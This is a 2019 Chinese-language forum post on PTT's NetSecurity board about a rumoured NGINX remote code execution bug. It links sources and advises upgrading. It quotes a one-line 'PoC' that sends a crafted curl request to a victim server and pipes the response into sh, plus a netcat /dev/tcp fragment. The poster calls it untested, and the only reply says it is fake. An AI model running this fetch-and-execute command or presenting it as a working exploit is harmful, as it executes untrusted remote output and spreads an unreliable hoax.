[情報] NGINX RCE

看板NetSecurity (資安 資訊安全)作者 (不要偷 Q)時間5年前 (2019/06/01 10:58), 編輯推噓0(001)
留言1則, 1人參與, 5年前最新討論串1/1
https://github.com/nginx/njs/issues/159 https://twitter.com/alisaesage/status/1134400951043874816 https://twitter.com/notdan/status/1134559331989434368 POC 的方式: curl -gsS \ https://victim.server.here:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00 \ <'protocol:TCP' -O 0x0238f06a#PLToffset | \ sh; nc /dev/tcp/localhost 完全沒經過測試 不過先升級 nginx 就是對的 -- ※ 發信站: 批踢踢實業坊(ptt.cc), 來自: 106.1.224.240 ※ 文章網址: https://www.ptt.cc/bbs/NetSecurity/M.1559357916.A.FB5.html

06/02 15:52, 5年前 , 1F
PoC 有人跳出來說是假的了
06/02 15:52, 1F
文章代碼(AID): #1SyUdS-r (NetSecurity)
文章代碼(AID): #1SyUdS-r (NetSecurity)